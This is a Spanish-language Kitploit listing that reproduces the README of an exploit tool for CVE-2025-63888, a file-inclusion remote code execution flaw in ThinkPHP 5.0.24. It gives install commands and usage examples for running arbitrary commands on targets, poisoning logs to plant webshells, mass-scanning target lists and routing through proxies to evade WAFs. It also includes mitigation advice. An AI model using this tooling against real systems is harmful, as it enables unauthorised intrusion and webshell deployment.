Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-63888-exploit — Herramienta de investigación de seguridad para detectar y probar CVE-2025-63888 (vulnerabilidad de ejecución remota de código por inclusión de archivos en ThinkPHP 5.0.24) | Kitploit
Herramientas/GitHubGitHub/an5i/cve-2025-63888-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Herramienta de investigación de seguridad para detectar y probar CVE-2025-63888 (vulnerabilidad de ejecución remota de código por inclusión de archivos en ThinkPHP 5.0.24)

Ver Repositorio
104hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-63888 ThinkPHP 5.0.24 File Inclusion RCE Exploit

Una herramienta de investigación de seguridad para detectar y probar la vulnerabilidad CVE-2025-63888 en ThinkPHP 5.0.24, que permite la ejecución remota de código mediante ataques de inclusión de archivos.

⚠️ Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta únicamente en sistemas que posea o para los cuales tenga permiso explícito por escrito para realizar pruebas.

📋 Descripción general

CVE-2025-63888 es una vulnerabilidad crítica de ejecución remota de código en ThinkPHP 5.0.24. La vulnerabilidad existe en la función read ubicada en thinkphp/library/think/template/driver/File.php, que permite a los atacantes ejecutar código arbitrario mediante ataques de inclusión de archivos manipulando la ruta de la plantilla en la función view().

Puntuación CVSS: 9.8 (Crítica)
Versión afectada: ThinkPHP 5.0.24 (versión exacta)
Archivo vulnerable: thinkphp/library/think/template/driver/File.php
Función vulnerable: Método read()

🔍 Características

  • Detección automática de ThinkPHP: Identifica instalaciones y versiones de ThinkPHP
  • Prueba de vulnerabilidad: Comprueba la vulnerabilidad de inclusión de archivos CVE-2025-63888
  • Descubrimiento de endpoints: Encuentra automáticamente endpoints vulnerables
  • Explotación de inclusión de archivos: Demuestra la capacidad de inclusión de archivos
  • Envenenamiento de archivos de registro: Intenta envenenar archivos de registro para RCE
  • Creación de webshells: Crea webshells mediante inclusión de archivos
  • Ejecución de comandos: Ejecuta comandos arbitrarios (para pruebas autorizadas)
  • Soporte de múltiples hilos: Escanea múltiples objetivos en paralelo
  • Soporte de proxy: Evita restricciones de WAF/Cloudflare
  • Exportación JSON: Resultados detallados en formato JSON

📦 Instalación

Requisitos previos

  • Python 3.6 o superior
  • pip (gestor de paquetes de Python)

Instalación rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x cve_2025_63888_exploit.py

Alternativa: Descarga directa

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Install dependencies
pip install requests

🚀 Uso

Uso básico

root@kitploit:~
# Single target
python3 cve_2025_63888_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_63888_exploit.py -u http://target.com -v

Uso de proxies

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

Opciones de línea de comandos

root@kitploit:~
-u, --url          URL del objetivo
-f, --file         Archivo que contiene las URL de los objetivos (una por línea)
-c, --command      Comando a ejecutar (por defecto: id)
-t, --threads      Número de hilos (por defecto: 1)
-o, --output       Archivo de salida (por defecto: uknf_results.json)
-v, --verbose      Habilitar registro detallado
--proxy            URL del proxy (ej., http://127.0.0.1:8080)
--proxy-list       Archivo que contiene las URL de los proxies (una por línea)

📊 Salida

El script genera un archivo JSON con resultados detallados:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 Cómo funciona

  1. Fase de detección: Escanea en busca de indicadores del framework ThinkPHP
  2. Detección de versión: Intenta identificar la versión de ThinkPHP (5.0.24)
  3. Prueba de vulnerabilidad: Comprueba la vulnerabilidad de inclusión de archivos
  4. Descubrimiento de endpoints: Encuentra endpoints vulnerables usando la función view()
  5. Explotación: Demuestra la capacidad de RCE mediante inclusión de archivos

🛡️ Mitigación

Si está utilizando ThinkPHP 5.0.24:

  1. Actualice inmediatamente:

    • Actualice a ThinkPHP 5.0.25+ o posterior
    • O actualice a ThinkPHP 6.x/7.x
  2. Implemente validación de rutas:

    • Añada una validación estricta de rutas en la función view()
    • Bloquee los caracteres de traversal de directorios (../, ..)
    • Restrinja las rutas de plantillas a directorios permitidos
  3. Correcciones a nivel de código:

    • Valide las rutas de plantillas antes de procesarlas
    • Utilice realpath() para asegurarse de que los archivos estén dentro de directorios permitidos
    • Implemente una lista blanca de funciones

📚 Referencias

  • CVE: CVE-2025-63888
  • GitHub Gist: Detalles de CVE-2025-63888
  • Artículo en Yuque: Análisis detallado
  • Manual de ThinkPHP: Documentación oficial

📖 Ejemplos

Ejemplo 1: Escaneo de un solo objetivo

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

Ejemplo 2: Múltiples objetivos con salida

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

Ejemplo 3: Ejecución de comando personalizado

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

Ejemplo 4: Uso de proxies

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dude en enviar una solicitud de extracción (Pull Request).

  1. Haga un fork del repositorio
  2. Cree su rama de características (git checkout -b feature/AmazingFeature)
  3. Realice sus cambios (git commit -m 'Add some AmazingFeature')
  4. Suba los cambios a la rama (git push origin feature/AmazingFeature)
  5. Abra una solicitud de extracción

🐛 Problemas

Si encuentra algún problema o tiene sugerencias, por favor abra un issue en GitHub.

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.

⭐ Historial de estrellas

Si encuentra útil esta herramienta, ¡considere darle una estrella en GitHub!

⚖️ Legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Los autores no se responsabilizan por ningún uso incorrecto o daño causado por este programa. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de probar cualquier sistema.

🙏 Agradecimientos

  • Reportero original de la vulnerabilidad: Master-0-0
  • Comunidad de seguridad de ThinkPHP
  • Investigadores de seguridad que contribuyeron al análisis de la vulnerabilidad

💰 Donaciones

Si encuentra útil esta herramienta y desea apoyar el proyecto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

¡Gracias por su apoyo! 🙏

Descargar herramienta